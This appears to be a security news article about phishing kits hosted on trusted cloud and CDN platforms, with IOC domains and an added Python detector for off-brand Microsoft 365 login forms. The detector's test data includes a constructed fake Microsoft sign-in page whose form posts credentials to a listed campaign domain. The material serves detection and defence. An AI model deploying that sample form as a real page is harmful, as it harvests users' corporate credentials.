Threat actors are increasingly hosting phishing kits on legitimate cloud and Content Delivery Network (CDN) platforms, posing a significant challenge for cybersecurity defenses. This evolving tactic, identified by researchers at Any.Run, moves away from traditional phishing methods that rely on newly registered, suspicious domains. Instead, attackers are leveraging trusted infrastructure from major providers like Google, Microsoft Azure, and AWS CloudFront, making their malicious campaigns harder to detect and block.
This shift to using legitimate cloud infrastructure for phishing kits means that malicious websites can appear trustworthy to unsuspecting users. By disguising their operations within the vast network of established technology companies, cybercriminals effectively bypass many standard security filters. This approach is particularly concerning as these campaigns are reportedly targeting enterprise users specifically, aiming to steal corporate credentials rather than general email accounts.
The Rise of Cloud-Hosted Phishing Infrastructure
The use of legitimate cloud and CDN platforms to host phishing kits is a notable escalation in social engineering attacks. Victims who land on these fake login pages are more likely to fall for the scam because the hostname ends in a domain they associate with a well-known technology company. Traditional network monitoring tools also struggle, because what they see is ordinary HTML served over TLS from a legitimate service, not the traffic patterns typically associated with malicious sites.
Researchers at Any.Run observed this growing trend while analyzing various phishing kit families. Their findings indicate that the Tycoon phishing kit, for instance, is operating from Microsoft Azure Blob Storage, utilizing the domain alencure[.]blob[.]core[.]windows[.]net. This specific example highlights how attackers are embedding their malicious content within legitimate cloud storage services.
Further analysis revealed that the Sneaky2FA phishing kit is being hosted on Firebase Cloud Storage at firebasestorage[.]googleapis[.]com and AWS CloudFront at cloudfront[.]net. These kits are designed to mimic Microsoft 365 login pages, aiming to harvest corporate account credentials. Another notable example is the EvilProxy phishing kit, which leverages Google Sites at sites[.]google[.]com to host its deceptive web pages.
Detection and Response Challenges with Cloud-Hosted Phishing
The employment of legitimate cloud and CDN platforms introduces unique obstacles for security teams tasked with detecting and responding to phishing threats. Conventional methods that rely on checking domain reputation are largely ineffective because the underlying hosting platforms are legitimate services used by countless organizations for benign purposes. Consequently, most security vendors classify these cloud domains as safe, which is technically accurate; the malicious activity stems from the content being served, not the infrastructure itself.
Effective detection of these threats requires a shift towards content and behavioral analysis rather than reliance on domain reputation alone. Security platforms must be able to examine what a cloud-hosted page actually serves and how the user interacts with it, and identify suspicious patterns such as a credential form that posts somewhere other than the brand it imitates, in real time. Any.Run reports that its sandbox exposes these threats within seconds, reducing both the mean time to detect and the mean time to respond.
To counter this threat, organizations should run threat intelligence lookups that specifically target abuse patterns on platforms such as Microsoft Azure Blob Storage, Firebase Cloud Storage, and Google Sites. The practical caveat is that the platform domain itself cannot be blocked, since countless legitimate tenants share it; detections and blocks have to pivot on the tenant-specific hostname or path (for example, the alencure[.]blob[.]core[.]windows[.]net storage account rather than blob[.]core[.]windows[.]net) and on the page content. By focusing on these indicators, security teams can proactively identify and mitigate these campaigns. Related indicators of compromise identified in connection with these campaigns include mphdvh[.]icu, kamitore[.]com, aircosspascual[.]com, and Lustefea[.]my[.]id.
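The following is an added example (not Any.Run's code or tooling) of the content-based triage the two preceding paragraphs describe: it ignores domain reputation entirely, scopes itself to the cloud and CDN platforms named in this article, skips the organization's own tenants, and flags a page only when it carries a Microsoft 365 look-alike login form whose credentials go somewhere other than a Microsoft login host or to one of the listed IOC domains. The tenant list, the sample pages, and the `example.org` and `corpassets` hostnames are constructed for illustration.

```python
"""Content-based detection of phishing kits on legitimate cloud/CDN hosts.

Added example, not Any.Run's code. Pairs two signals: the page is served
from a trusted platform anyone can create a tenant on, and the content is
a Microsoft 365 look-alike login form posting credentials off-brand.
"""
from dataclasses import dataclass, field
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlsplit

# Platforms named in the article: exact hosts vs. per-tenant subdomains.
ABUSABLE_EXACT = {"firebasestorage.googleapis.com", "sites.google.com"}
ABUSABLE_SUFFIXES = (".blob.core.windows.net", ".cloudfront.net")

# Hosts that legitimately receive Microsoft 365 credentials.
MICROSOFT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}

# The organization's own tenants (hypothetical; fill from your cloud inventory).
KNOWN_TENANTS = {"corpassets.blob.core.windows.net"}

# Infrastructure IOCs the article associates with these campaigns (refanged).
CAMPAIGN_IOCS = {"mphdvh.icu", "kamitore.com", "aircosspascual.com", "lustefea.my.id"}

BRAND_MARKERS = ("microsoft", "office 365", "sign in to your account")


def hosting_platform(host):
    """Return the abusable platform a host belongs to, or None if out of scope."""
    host = host.lower()
    if host in ABUSABLE_EXACT:
        return host
    for suffix in ABUSABLE_SUFFIXES:
        if host.endswith(suffix):
            return suffix.lstrip(".")
    return None


class LoginFormParser(HTMLParser):
    """Collect form actions, password inputs and visible text from a page."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.text, self.has_password = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.has_password = True

    def handle_data(self, data):
        self.text.append(data.lower())


@dataclass
class Finding:
    url: str
    platform: Optional[str]
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self):
        return bool(self.reasons)


def analyze_page(url, html):
    """Score one fetched page. Domain reputation is deliberately not consulted."""
    host = (urlsplit(url).hostname or "").lower()
    platform = hosting_platform(host)
    finding = Finding(url, platform)
    if platform is None or host in KNOWN_TENANTS:
        return finding  # not a shared cloud platform, or our own tenant
    p = LoginFormParser()
    p.feed(html)
    branded = any(m in " ".join(p.text) for m in BRAND_MARKERS)
    if p.has_password and branded:
        finding.reasons.append(f"Microsoft 365 look-alike login form served from {platform}")
    for action in p.form_actions:
        # A relative action posts back to the cloud host, which is still not Microsoft.
        target = (urlsplit(action).hostname or host).lower()
        if p.has_password and target not in MICROSOFT_LOGIN_HOSTS:
            finding.reasons.append(f"credential form posts to {target}, not a Microsoft login host")
        if target in CAMPAIGN_IOCS or any(target.endswith("." + i) for i in CAMPAIGN_IOCS):
            finding.reasons.append(f"form target {target} matches a campaign IOC")
    return finding


def triage(pages):
    """pages: iterable of (url, html). Returns only the suspicious findings."""
    return [f for f in (analyze_page(u, h) for u, h in pages) if f.suspicious]


# Constructed sample pages (not real captures).
FAKE_M365 = """<html><title>Sign in to your account</title><body>
<img alt="Microsoft"><form action="https://mphdvh.icu/auth.php" method="post">
<input name="login" type="email"><input name="passwd" type="password">
<button>Sign in</button></form></body></html>"""
BENIGN_DOC = "<html><body><h1>Quarterly report</h1><p>Microsoft Excel export</p></body></html>"

SAMPLE_PAGES = [
    ("https://alencure.blob.core.windows.net/site/index.html", FAKE_M365),
    ("https://corpassets.blob.core.windows.net/site/index.html", FAKE_M365),  # own tenant
    ("https://firebasestorage.googleapis.com/v0/b/x/o/report.html", BENIGN_DOC),
    ("https://example.org/login", FAKE_M365),  # not a shared platform: other controls apply
]

if __name__ == "__main__":
    for f in triage(SAMPLE_PAGES):
        print(f.url)
        for r in f.reasons:
            print("  -", r)
```

Only the page on the unknown `alencure` storage account is reported; the same HTML on the organization's own tenant is skipped, the benign Firebase document has no credential form, and the `example.org` page falls outside this detector's scope. In production the `pages` input would come from a URL sandbox or proxy that fetches the HTML, and the tenant hostname and form target from each finding are what you add to blocklists, not the platform domain.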
The ongoing evolution of phishing tactics, particularly the move towards leveraging established cloud infrastructure, indicates that attackers will continue to seek out and exploit trusted services. Security vendors and organizations will need to adapt their detection strategies to focus on content and user behavior, rather than solely on domain reputation. Continuous monitoring and rapid threat intelligence sharing will be crucial in staying ahead of these sophisticated social engineering attacks.